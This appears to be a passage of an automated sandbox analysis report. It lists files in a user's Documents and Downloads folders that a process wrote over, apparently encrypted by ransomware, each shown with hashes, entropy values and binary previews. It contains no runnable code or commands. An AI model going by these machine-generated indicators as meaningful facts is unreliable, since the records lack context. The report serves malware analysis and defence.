                                                                                    SHA-256:8ED589E9816C1E0443A8AA5D50C2F52C8272FDE104535794BAF94B78C6FA5FF7
                                                                                    SHA-512:7C297E57298FA839D17BF5BFDD567DA8723808343EAB074661772B01678D0B3710DEB6D06D2E890E610D12A501DBB8E4BE7095BDCCDEE40B18BC16A156F6DA5F
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: hH.JZ.,....k.L..=.c{.....J.....X......Tc?..B3e..f..3..@.;..J\..w.:..E.#....>.g..,..J....6Tj...3&...t.I.........3t..l.v'_...A..0.58....F.....{#...?.;.Z..&.>/#J.C....}..cKR=....s.....j?.v.7......_....ZS..$D.U=... .M...L..]...r..A].g...........Ja.E...h.(.k.!......'......L..}.iD....u....q...e......`=N~...*..4....3u.O.%...#'D...i...#....i...6.?....&..;;+.M....'..I...:x...J....._a9i*....5.g.F.g.....g.R.D.)Z.?C.W.p(.U..4J.2Q...M...o..h.\."....L..ED.P....r.L......|.X.4.sOp._.U.o.D.}. .....3..e%!0....dJKV..G....I.~.(....;G...E.s.c./....G=..a...............4..BPY.$.+.^.JM.l...O.#*...E..r..By.\.^..h....s............\2....].8..`...&&..t.<.....A.".G...k.B.t.G..c\..*~k..5..#?.L...o..=..7.....e^.....N.....}.....-..Q7..v^O9..gQD..m...g57..(|.e..).7TIQI.H..j....u.]m]...R...`..i.....;|...E.{.!.J..F2...,........b;....r..e.I..".>.x.>k|.8.[......6I[.U!".9.O.krqv.C.....L1T.5`...a...L..GlZ..*.......?%..H..2..6&.&'......3d..=..HO|w...^..e..aI..z[...;q
                                                                                    C:\Users\user\Documents\QNCYCDFIJJ\QCFWYSKMHA.xlsx.tisc (copy)
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):1355
                                                                                    Entropy (8bit):7.853419808143101
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:yEnxsX8qH6B65iJyZUDNuP/iGXPR+sLl73nFHlao0z3mvaQOBCwjf//gbD:ynXta64gZUDNuP/igJXRnFFao0z3mSQ7
                                                                                    MD5:04D70E3AFCC3FC9F9218839D766269C6
                                                                                    SHA1:D71EC14144F38F646D7E8E6B1F0C6D23A7B987FD
                                                                                    SHA-256:8ED589E9816C1E0443A8AA5D50C2F52C8272FDE104535794BAF94B78C6FA5FF7
                                                                                    SHA-512:7C297E57298FA839D17BF5BFDD567DA8723808343EAB074661772B01678D0B3710DEB6D06D2E890E610D12A501DBB8E4BE7095BDCCDEE40B18BC16A156F6DA5F
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: hH.JZ.,....k.L..=.c{.....J.....X......Tc?..B3e..f..3..@.;..J\..w.:..E.#....>.g..,..J....6Tj...3&...t.I.........3t..l.v'_...A..0.58....F.....{#...?.;.Z..&.>/#J.C....}..cKR=....s.....j?.v.7......_....ZS..$D.U=... .M...L..]...r..A].g...........Ja.E...h.(.k.!......'......L..}.iD....u....q...e......`=N~...*..4....3u.O.%...#'D...i...#....i...6.?....&..;;+.M....'..I...:x...J....._a9i*....5.g.F.g.....g.R.D.)Z.?C.W.p(.U..4J.2Q...M...o..h.\."....L..ED.P....r.L......|.X.4.sOp._.U.o.D.}. .....3..e%!0....dJKV..G....I.~.(....;G...E.s.c./....G=..a...............4..BPY.$.+.^.JM.l...O.#*...E..r..By.\.^..h....s............\2....].8..`...&&..t.<.....A.".G...k.B.t.G..c\..*~k..5..#?.L...o..=..7.....e^.....N.....}.....-..Q7..v^O9..gQD..m...g57..(|.e..).7TIQI.H..j....u.]m]...R...`..i.....;|...E.{.!.J..F2...,........b;....r..e.I..".>.x.>k|.8.[......6I[.U!".9.O.krqv.C.....L1T.5`...a...L..GlZ..*.......?%..H..2..6&.&'......3d..=..HO|w...^..e..aI..z[...;q
                                                                                    C:\Users\user\Documents\QNCYCDFIJJ\QNCYCDFIJJ.docx
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):1355
                                                                                    Entropy (8bit):7.847077044850384
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:PshA1FuXuSLoHtvvzojpipodeGxXn+7S7RMl8/e72EF5y/gbD:PsWnSIvvjaRln+uV59EDyyD
                                                                                    MD5:71F9CDE5836C020F91043B43C72DC9CF
                                                                                    SHA1:E2EB58938C232896C479627E0C064BA8B97AA026
                                                                                    SHA-256:A0A4AEC0B2DED291D325580A7D578A7878583F06052C7C97E0D60A4E2E669F8D
                                                                                    SHA-512:F263691B90BCD4E7481958BE6EE1F305D3D30E6009CFDE6301BF4CC5C53AD6647712E33467C6F4C89915A65D1B9124ABA6A051C42F521A13356064F2A703E09E
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: ...M.:.2t'.%=X.8.a.x...y..........`..e..}.dO!....-..f..0~.....9.....x....li..y-.`0\\.I..I2cu..wk4.gW...O..._.t...E......Q...R....tl...N.. Q{...m.0 .J..[..X....\(.bh....T..(H.]&...."....r........_...~....d.]...3..z.b...,...4.O..Pk.6\.z.XL.E..*.O.....[T.@x.e.p.D1..&....`......m....:...fP.T..V.,..7......a.D.S....w..[....h.......^....k].;.j..W>..).0~...A}p...."........?...*l..A..2....;..31..#........VR......A..i&._...Z.u...$7..R..qx;$....r..iJW.w..a..E.ZsL.a........g...m.~4D.oT"..Y..x...#.#.,..2iD.E..W...3..........Bp.{<...@zw7.7L[N:.D...0..=.\]..l....$Yr6..._2....Om....M..I.?d.D>.N.........(.>.....}\f.!P..o..N...=S.*$.Z...u.+@...|..<o:1.1`.x~S...R.D.4.k....)..r .c.....22.an.......s....HV.L...%...K.Sd}..d...HL.Lz...9............i?....F^?'.PX1=....o..d-C+...G..'a.Ndv....@.~.o_...9.~..]..{...C..r....E............7.D..!.$nE..~.1 ...W.....Mr*4JF.......-.....j......i...VV..K.bR.s.-.....7....3K..hD..WTRN..w........{.A..vJ...r...P
                                                                                    C:\Users\user\Documents\QNCYCDFIJJ\QNCYCDFIJJ.docx.tisc (copy)
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):1355
                                                                                    Entropy (8bit):7.847077044850384
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:PshA1FuXuSLoHtvvzojpipodeGxXn+7S7RMl8/e72EF5y/gbD:PsWnSIvvjaRln+uV59EDyyD
                                                                                    MD5:71F9CDE5836C020F91043B43C72DC9CF
                                                                                    SHA1:E2EB58938C232896C479627E0C064BA8B97AA026
                                                                                    SHA-256:A0A4AEC0B2DED291D325580A7D578A7878583F06052C7C97E0D60A4E2E669F8D
                                                                                    SHA-512:F263691B90BCD4E7481958BE6EE1F305D3D30E6009CFDE6301BF4CC5C53AD6647712E33467C6F4C89915A65D1B9124ABA6A051C42F521A13356064F2A703E09E
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: ...M.:.2t'.%=X.8.a.x...y..........`..e..}.dO!....-..f..0~.....9.....x....li..y-.`0\\.I..I2cu..wk4.gW...O..._.t...E......Q...R....tl...N.. Q{...m.0 .J..[..X....\(.bh....T..(H.]&...."....r........_...~....d.]...3..z.b...,...4.O..Pk.6\.z.XL.E..*.O.....[T.@x.e.p.D1..&....`......m....:...fP.T..V.,..7......a.D.S....w..[....h.......^....k].;.j..W>..).0~...A}p...."........?...*l..A..2....;..31..#........VR......A..i&._...Z.u...$7..R..qx;$....r..iJW.w..a..E.ZsL.a........g...m.~4D.oT"..Y..x...#.#.,..2iD.E..W...3..........Bp.{<...@zw7.7L[N:.D...0..=.\]..l....$Yr6..._2....Om....M..I.?d.D>.N.........(.>.....}\f.!P..o..N...=S.*$.Z...u.+@...|..<o:1.1`.x~S...R.D.4.k....)..r .c.....22.an.......s....HV.L...%...K.Sd}..d...HL.Lz...9............i?....F^?'.PX1=....o..d-C+...G..'a.Ndv....@.~.o_...9.~..]..{...C..r....E............7.D..!.$nE..~.1 ...W.....Mr*4JF.......-.....j......i...VV..K.bR.s.-.....7....3K..hD..WTRN..w........{.A..vJ...r...P
                                                                                    C:\Users\user\Documents\QNCYCDFIJJ\SUAVTZKNFL.jpg
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):1355
                                                                                    Entropy (8bit):7.8488327863432215
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:IARdK1rg1FYLO4R2fwzIZPePoBY85dZBXOizF2qVJlRWOtp9260RvIreeaAWYgbD:IaI1c1Oa4AfxZmAu8Z53F3JlTp9260ya
                                                                                    MD5:4942ED8224E32F8456A9EA12A18EB814
                                                                                    SHA1:3C70181B510DBCD8A7944B79C6A5A5BB6D4C6DCD
                                                                                    SHA-256:A3B6898F6236DAEB94A7802B7FE0945B221CE3A53D037945B7348A5C6ECA7B5B
                                                                                    SHA-512:EDE2319C4C8496CF62CFEE2A2DCC8B60314B810A9AA9D0E26F211601FC2436FEA932776782EEEE251469887A275DD7B76E592933C5B617CF6429D161693EC6BB
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: ...A5e.c.*...;......%.7.h-n5....F\.j.0.Q.9...2...~..d4....|P5.@.......8#t.....0...T.....W.4.rZ..w....}p*c......&...b.p.B#.....(..H.....1._9'".....A.Q....1KG..\...0.C..LY]...g.Ih.y...w8.A....L..IE1...3.n..;..$.:.. ZL.&..J.~..l.B.Y i..s|@...J.BwI_.e..g.b...r.~P...U..$.$...J..3?_..Z......P.......Z."..K%..(z{FYE[}.D.9....oU.......OJ..'..M..).Yx...iX......u...{n......D...^$p..v....N...?.T.S&=....P.<..b^..qAus' .)..r.....kk...1......d.z..i.[cJ=.c.~..D_S$\./...A.....^.]]Dd.....6..Z....-..4....x..N:...}:;.lL...A..8W.T9..]...>>k...'s.........K.E.A...Z.PT...?.r....I..G|....\.'6...}..T}.._^.El......XDE....5.M..G.......gZ...........2.......j.@.1Q.z.C.2.......)>..%.B.6...'.sv..K...F......R*l,!3.4...s.g?f.8...q..C.d-...pa..|C............fz...(.Y0L*...|Q..R....x.3....Sl....H..M^.....C,.p.2..|....wx.X...U.bl..G7.......I...#......,-m.$.../.).|kV.....l....D^......?...v...5.VI.Q%.j.:....i........J.U..QD........f!..W/q..}...L.>.....`..{..U.[......
                                                                                    C:\Users\user\Documents\QNCYCDFIJJ\SUAVTZKNFL.jpg.tisc (copy)
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):1355
                                                                                    Entropy (8bit):7.8488327863432215
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:IARdK1rg1FYLO4R2fwzIZPePoBY85dZBXOizF2qVJlRWOtp9260RvIreeaAWYgbD:IaI1c1Oa4AfxZmAu8Z53F3JlTp9260ya
                                                                                    MD5:4942ED8224E32F8456A9EA12A18EB814
                                                                                    SHA1:3C70181B510DBCD8A7944B79C6A5A5BB6D4C6DCD
                                                                                    SHA-256:A3B6898F6236DAEB94A7802B7FE0945B221CE3A53D037945B7348A5C6ECA7B5B
                                                                                    SHA-512:EDE2319C4C8496CF62CFEE2A2DCC8B60314B810A9AA9D0E26F211601FC2436FEA932776782EEEE251469887A275DD7B76E592933C5B617CF6429D161693EC6BB
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: ...A5e.c.*...;......%.7.h-n5....F\.j.0.Q.9...2...~..d4....|P5.@.......8#t.....0...T.....W.4.rZ..w....}p*c......&...b.p.B#.....(..H.....1._9'".....A.Q....1KG..\...0.C..LY]...g.Ih.y...w8.A....L..IE1...3.n..;..$.:.. ZL.&..J.~..l.B.Y i..s|@...J.BwI_.e..g.b...r.~P...U..$.$...J..3?_..Z......P.......Z."..K%..(z{FYE[}.D.9....oU.......OJ..'..M..).Yx...iX......u...{n......D...^$p..v....N...?.T.S&=....P.<..b^..qAus' .)..r.....kk...1......d.z..i.[cJ=.c.~..D_S$\./...A.....^.]]Dd.....6..Z....-..4....x..N:...}:;.lL...A..8W.T9..]...>>k...'s.........K.E.A...Z.PT...?.r....I..G|....\.'6...}..T}.._^.El......XDE....5.M..G.......gZ...........2.......j.@.1Q.z.C.2.......)>..%.B.6...'.sv..K...F......R*l,!3.4...s.g?f.8...q..C.d-...pa..|C............fz...(.Y0L*...|Q..R....x.3....Sl....H..M^.....C,.p.2..|....wx.X...U.bl..G7.......I...#......,-m.$.../.).|kV.....l....D^......?...v...5.VI.Q%.j.:....i........J.U..QD........f!..W/q..}...L.>.....`..{..U.[......
                                                                                    C:\Users\user\Documents\SUAVTZKNFL.jpg
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):1355
                                                                                    Entropy (8bit):7.851403267842275
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:a8Q0pnRyvr0BUWthoskLxqBCOeJQ73Cb7/jackoGKpYAEsQBuqggbD:tzpnR8YBUUhos48pbmK+GkeFu0D
                                                                                    MD5:3E412A9FB691E00BABC30F4181FA97FE
                                                                                    SHA1:BA1706C5999C52035DD5ADA60D0260BADEA5C231
                                                                                    SHA-256:DAB0EE1275C0441F4CA43F41FFF5258D819341811E5E20164102CFF0326D8E85
                                                                                    SHA-512:5152244C616749FBAC80C61CE5793EF1B66DE874B2DBD312A67A82E24E2FE084BB52BB23FB70A1553E1F4B3C1BFF943E0F0C8371C2F1C5964DACCA271691AB10
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: ....3.....P.u|l.H...wD....b..`f...V]Y7.p......r.2......_Wx+..,.($*..5..*......:..?< .........H".....&..(...s@.n....r.S...a...j5uU.4..........T...?.d.g<......j.JK..=.`..T.%..Xl.Q....:m76......E.>.=...N!kwHK..2....~...v..l...~..(.su.A.->.~.hS.....&.J..9....(.n.t..).B....Sl...7]..M.a.~......V..!C.6F...X|......l`.o.W.]._..y.m....2..#..<'..0..<l\rOng...y.&..e.t.a.Q..p.h?6$J.9......B.t.X2...IK...A...5....ge....0:..3=.a.....8.-.C..V...h.....8j..+iE_....Ys.`H...E...7K..M.%7.>w..q....1..%.!..@J..[F.y&_.4n..U}K+7.b(.9..e`.....J...rC,..Um..?>ijE....z...u8...*.B..I.'f......?.H...3.."N..B.8.$R.`.u....x9|.%.f.V.|...~.r..F.u..X......Pe...c.../cz..^..4....^.J.....jO'..?...$..W..n.{.....X...*[c.-....e#......4}..."...=lO..R..R.N?g.....h'....9m.-......u.].@5?}..}...H$19.{........N.p..o3.=4....V@ +..|...I..P.O.....z..q9....!?.,.......$...,...^m.....'.*...6.c....6...#Ob.Jc.. W.:t...5..6....R..........6.....0b.xI.R.|..aZ(...k..^.../...5.[...A.[8....N.....3...
                                                                                    C:\Users\user\Documents\SUAVTZKNFL.jpg.tisc (copy)
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):1355
                                                                                    Entropy (8bit):7.851403267842275
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:a8Q0pnRyvr0BUWthoskLxqBCOeJQ73Cb7/jackoGKpYAEsQBuqggbD:tzpnR8YBUUhos48pbmK+GkeFu0D
                                                                                    MD5:3E412A9FB691E00BABC30F4181FA97FE
                                                                                    SHA1:BA1706C5999C52035DD5ADA60D0260BADEA5C231
                                                                                    SHA-256:DAB0EE1275C0441F4CA43F41FFF5258D819341811E5E20164102CFF0326D8E85
                                                                                    SHA-512:5152244C616749FBAC80C61CE5793EF1B66DE874B2DBD312A67A82E24E2FE084BB52BB23FB70A1553E1F4B3C1BFF943E0F0C8371C2F1C5964DACCA271691AB10
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: ....3.....P.u|l.H...wD....b..`f...V]Y7.p......r.2......_Wx+..,.($*..5..*......:..?< .........H".....&..(...s@.n....r.S...a...j5uU.4..........T...?.d.g<......j.JK..=.`..T.%..Xl.Q....:m76......E.>.=...N!kwHK..2....~...v..l...~..(.su.A.->.~.hS.....&.J..9....(.n.t..).B....Sl...7]..M.a.~......V..!C.6F...X|......l`.o.W.]._..y.m....2..#..<'..0..<l\rOng...y.&..e.t.a.Q..p.h?6$J.9......B.t.X2...IK...A...5....ge....0:..3=.a.....8.-.C..V...h.....8j..+iE_....Ys.`H...E...7K..M.%7.>w..q....1..%.!..@J..[F.y&_.4n..U}K+7.b(.9..e`.....J...rC,..Um..?>ijE....z...u8...*.B..I.'f......?.H...3.."N..B.8.$R.`.u....x9|.%.f.V.|...~.r..F.u..X......Pe...c.../cz..^..4....^.J.....jO'..?...$..W..n.{.....X...*[c.-....e#......4}..."...=lO..R..R.N?g.....h'....9m.-......u.].@5?}..}...H$19.{........N.p..o3.=4....V@ +..|...I..P.O.....z..q9....!?.,.......$...,...^m.....'.*...6.c....6...#Ob.Jc.. W.:t...5..6....R..........6.....0b.xI.R.|..aZ(...k..^.../...5.[...A.[8....N.....3...
                                                                                    C:\Users\user\Documents\SUAVTZKNFL.xlsx
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):1355
                                                                                    Entropy (8bit):7.83967878375075
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:L5msh44y39DQAPP7tELTE4hg8o6lhLB8Y7RoCyUZhv7jqgzNlPFSHmUn7xKrcv1M:Nn4jJQAPPhELTJK6jBNdlyohCgzfPFSO
                                                                                    MD5:46977B572D06FBC248C5F38FFA003CC9
                                                                                    SHA1:998A24536D6672F0B0F1188B4ED488DAA71130F2
                                                                                    SHA-256:2B315BD9A8B9E9DD70C7A4E8FC6F6911C967D45FBA6FB2342C84F3C696FA4BE0
                                                                                    SHA-512:0D00B8CA9876BFB010D5460224C6B2D36DF39A00C9E74085C71BAF0FAB8C55D430BA8780CEA9280B7CC6B053DDE391506ABC4289E55D2471D62B6052376EE7B0
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: R'iR.......U.*....8g....M...Q[..v.......k.?\i.yf.o]...x..2....^...=.x.e>.B+y.n...I..!...uSj....7x........v...&.P...7.W\E.o.......2?....F.,)......a...<.....X8CP.V....Ir.C....b.........vv."FfJ...";X.}t._.........R..\..N.$.. /.c..xvI..[9-.thi?@...y..7....G.[I.:9..;...._#...r.e..h.5...z;.3MG......].A....c ...+..O......+pX..d...}.Y.3......C.(.F.L.x"9.*.f..7...z._z...=..FR..a.<.......c..F.=W....V..'.1.....X^.Yno.1K........U.Ww......O.....3.1.f?.;Y.5..0.e2.8V..I.[.>...........`.+b...:.......@r.;...d.t?.w+t.t.)n.a.Pu..".X.s.G...,48l.K^...U..8.um.Q.Z...Eo..9.~.e..s.._......?qi.9...T.#$..a.X.f..z.q)..c.(..OyL./?.A.Uk.sC....z.0;;.h..gI.`.....}Vg=.c.&=A.u...1...6...4.c.....b`..|....l..#.=#.|Q@n.-C..G.L.[o...w..b.u...1^A.v6.V3...U...3.h._w.8.~.>...9s.KTQQ(V.=%.X..j..>.LM ..k.L?..dX...Yl.C...\.LU..._K..SZ^....L..."L.9H..kF....j..... ..h..JzQ.0.....i.*G.'....C5.L^........W.*.....~?..)..U.dn=..7.?..J.....X..\.a..]j.....=k/...z...8..s<... ..[..z.s....").6S
                                                                                    C:\Users\user\Documents\SUAVTZKNFL.xlsx.tisc (copy)
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):1355
                                                                                    Entropy (8bit):7.83967878375075
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:L5msh44y39DQAPP7tELTE4hg8o6lhLB8Y7RoCyUZhv7jqgzNlPFSHmUn7xKrcv1M:Nn4jJQAPPhELTJK6jBNdlyohCgzfPFSO
                                                                                    MD5:46977B572D06FBC248C5F38FFA003CC9
                                                                                    SHA1:998A24536D6672F0B0F1188B4ED488DAA71130F2
                                                                                    SHA-256:2B315BD9A8B9E9DD70C7A4E8FC6F6911C967D45FBA6FB2342C84F3C696FA4BE0
                                                                                    SHA-512:0D00B8CA9876BFB010D5460224C6B2D36DF39A00C9E74085C71BAF0FAB8C55D430BA8780CEA9280B7CC6B053DDE391506ABC4289E55D2471D62B6052376EE7B0
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: R'iR.......U.*....8g....M...Q[..v.......k.?\i.yf.o]...x..2....^...=.x.e>.B+y.n...I..!...uSj....7x........v...&.P...7.W\E.o.......2?....F.,)......a...<.....X8CP.V....Ir.C....b.........vv."FfJ...";X.}t._.........R..\..N.$.. /.c..xvI..[9-.thi?@...y..7....G.[I.:9..;...._#...r.e..h.5...z;.3MG......].A....c ...+..O......+pX..d...}.Y.3......C.(.F.L.x"9.*.f..7...z._z...=..FR..a.<.......c..F.=W....V..'.1.....X^.Yno.1K........U.Ww......O.....3.1.f?.;Y.5..0.e2.8V..I.[.>...........`.+b...:.......@r.;...d.t?.w+t.t.)n.a.Pu..".X.s.G...,48l.K^...U..8.um.Q.Z...Eo..9.~.e..s.._......?qi.9...T.#$..a.X.f..z.q)..c.(..OyL./?.A.Uk.sC....z.0;;.h..gI.`.....}Vg=.c.&=A.u...1...6...4.c.....b`..|....l..#.=#.|Q@n.-C..G.L.[o...w..b.u...1^A.v6.V3...U...3.h._w.8.~.>...9s.KTQQ(V.=%.X..j..>.LM ..k.L?..dX...Yl.C...\.LU..._K..SZ^....L..."L.9H..kF....j..... ..h..JzQ.0.....i.*G.'....C5.L^........W.*.....~?..)..U.dn=..7.?..J.....X..\.a..]j.....=k/...z...8..s<... ..[..z.s....").6S
                                                                                    C:\Users\user\Downloads\BJZFPPWAPT.mp3
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):1355
                                                                                    Entropy (8bit):7.825171126814661
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:lwBy91pvoNUf74vP08469vLyukHfc29eENViT41F4Ny5Llhwe2pNm/aORru2WPgX:lqIKO7c0846ZyuvENs41Pnw3NlSnD
                                                                                    MD5:7B5B73DBBEA32C68639012A2D06F3D78
                                                                                    SHA1:2D51C4DDF4787632A072832CEA606578925E5565
                                                                                    SHA-256:DE441206BE0CAAC9C1A8DE7C1A318201E7B8DBB0E50BBB27DFED3DBEF6FF9189
                                                                                    SHA-512:1F2700141E227E8C2D9B240712FCE2BA8236E3E15BA620DB895E20854538C7AF57CDCF8B22ACC850B2FB11FE96073E217D1682407D8E77E7AF0D375CEBA16DD2
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: .,...W{...!.c..K../.....C..bD.......E&E&...4|.K..}{~....$.0....A...;.4_OE{...I<.7....)..bL....._....1.K(...;E*..Xs.(v.5....!..Jd...i...{.#.q.....D].*.m.{7M......8.X-....n...h..vn..Mf............o?..].k..Ay..f..8:...f.,...Wd|g.8..^%6...O6.-..l.5......O..9.}O...Z.P.(.4ila.,..A.O..U......>w...I.uV.4...-..SO.6<.0...7|e...6....w..e8.&.?...d.D.-.|..8-!....,..#.'..).%..2aA...>.mY$.N...w....5.f.oo..<'9...!.~...<......L..&C...~+..\.}._R.K.E...-.{D.dL...G..4...DH.%U.w.\.-..YH.}s&7%...Ow.t...gm.....1.6...%/Y.*.X...=....0q|..M../c.>.7.t.....JQ..;.....O.....Z ...E6.e8C)A.LCM?.\.Uw.^.....5...~.`s.........<."....h...vd....P...`..}."5..U.0.&p....$Tl....^.....+...P2P.E*..h....'.....- .}..z...<...b*4...&.Wt....@.2.U)..W7.,.(.n.1.|...-&WJ...iruam8'U...c..7,n.Hp.KD=.Q#.;..o.....m.S.....HHA..AG..Vz..F..7j....hI.y.d..@...V....aKe..*.Y..V>.)....~...n!.M.g.x.+'.f.\.E..1...[.CP.".4o...nZ.......h...*I..`-.(....TU......U..b...E.....Ei..O*.Lo..@..d.J...4.0..p/.C......R}.
                                                                                    C:\Users\user\Downloads\BJZFPPWAPT.mp3.tisc (copy)
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):1355
                                                                                    Entropy (8bit):7.825171126814661
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:lwBy91pvoNUf74vP08469vLyukHfc29eENViT41F4Ny5Llhwe2pNm/aORru2WPgX:lqIKO7c0846ZyuvENs41Pnw3NlSnD
                                                                                    MD5:7B5B73DBBEA32C68639012A2D06F3D78
                                                                                    SHA1:2D51C4DDF4787632A072832CEA606578925E5565
                                                                                    SHA-256:DE441206BE0CAAC9C1A8DE7C1A318201E7B8DBB0E50BBB27DFED3DBEF6FF9189
                                                                                    SHA-512:1F2700141E227E8C2D9B240712FCE2BA8236E3E15BA620DB895E20854538C7AF57CDCF8B22ACC850B2FB11FE96073E217D1682407D8E77E7AF0D375CEBA16DD2
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: .,...W{...!.c..K../.....C..bD.......E&E&...4|.K..}{~....$.0....A...;.4_OE{...I<.7....)..bL....._....1.K(...;E*..Xs.(v.5....!..Jd...i...{.#.q.....D].*.m.{7M......8.X-....n...h..vn..Mf............o?..].k..Ay..f..8:...f.,...Wd|g.8..^%6...O6.-..l.5......O..9.}O...Z.P.(.4ila.,..A.O..U......>w...I.uV.4...-..SO.6<.0...7|e...6....w..e8.&.?...d.D.-.|..8-!....,..#.'..).%..2aA...>.mY$.N...w....5.f.oo..<'9...!.~...<......L..&C...~+..\.}._R.K.E...-.{D.dL...G..4...DH.%U.w.\.-..YH.}s&7%...Ow.t...gm.....1.6...%/Y.*.X...=....0q|..M../c.>.7.t.....JQ..;.....O.....Z ...E6.e8C)A.LCM?.\.Uw.^.....5...~.`s.........<."....h...vd....P...`..}."5..U.0.&p....$Tl....^.....+...P2P.E*..h....'.....- .}..z...<...b*4...&.Wt....@.2.U)..W7.,.(.n.1.|...-&WJ...iruam8'U...c..7,n.Hp.KD=.Q#.;..o.....m.S.....HHA..AG..Vz..F..7j....hI.y.d..@...V....aKe..*.Y..V>.)....~...n!.M.g.x.+'.f.\.E..1...[.CP.".4o...nZ.......h...*I..`-.(....TU......U..b...E.....Ei..O*.Lo..@..d.J...4.0..p/.C......R}.
                                                                                    C:\Users\user\Downloads\BNAGMGSPLO.mp3
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):1355
                                                                                    Entropy (8bit):7.824480771584375
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:0Ahp3thpGYJob0/alMQq8w8pGV1Z/jM8h4v3ess2oqZ24/FgN93ChGgbD:ZT3thpGYib0/MMXP8pGzZL1K3Hs21r/v
                                                                                    MD5:BE11F589679C2D650F29795402419612
                                                                                    SHA1:0025ACCC276203DBFEFC00218D2D1480F5897ACC
                                                                                    SHA-256:3F2C4911A0B6E547FC0F986AAE35874D5817D37AE0197C4AB871A40BB80A83DF
                                                                                    SHA-512:96951A46FAAA5BF8D2DA5A487E93F50057382F5D3FF8B20A3F5A65B5BDBE60A4409727F16F673567F32AA4FC35B6E00BB74441C447E0ACFA5974C6CCB93A90A5
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: ....85.y..]?..R......4].1-......3....4+... .y..>....p...Pxp...#_..c.......8../..v...[s..AK<R...v.[.w..o..\..aL9..D..^3.......X.P"HqY.s.JLi...A......[.9F{oG.m..0.Q'&.......+2.:.vY..VpN$..,A.iO!...]....G.@*.......$6.....z.W.3.V.]...@.Q...B0od.K...N&.lJ...@..m......A&Y3....E9..F.k...o.2L...=1h...%I.3I...<3...;;.I...o.~F.!m.%..s.<.......Jvo.1..g..B7....qQ....uC.....{.L.Z.mf~..].\.V....&k|.z..T;..p.<.GA.....%.m.....:<j..].=y.Y,........[N>.&"6....X]...1AF+....D..uhv..*....z.....Dll..{.!.y.P.E.X;.\...-W.Qn..DR.P.P.....&....V.....t.2...0y5l.H..v.2..@,.e>...z.5I9.J.+......c.~......V....a].cb.9.<.9=..i.w..v9.~..c.k K...;&W..XO=....j......I'..P...l..........0 ........G.3.<YW.=..d.x6.../..,].".N...$.S..h..m....D...&C.Y...Z......G.0.Y..;n....G.......{..E..sK..........8...f..F.-....G.Z..a.N.H..n...O....opx.O=.9.&..DgE..0.KP.3.le.WZ,...B..F.......,.H....G.@.......o.......P..}.`..Q.lg.yZ.pe......E<..9.ju'*.j...T.|.nT/.Y.-.......uz..VD; .T...."2nyN...a
                                                                                    C:\Users\user\Downloads\BNAGMGSPLO.mp3.tisc (copy)
